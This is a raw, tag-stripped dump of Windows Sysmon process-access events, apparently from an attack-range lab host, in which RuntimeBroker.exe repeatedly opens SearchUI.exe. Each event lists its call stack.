13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1382d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+180f1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10ec7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9 10341000x800000000000000012012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+180f1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10ec7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+180f1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10ec7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 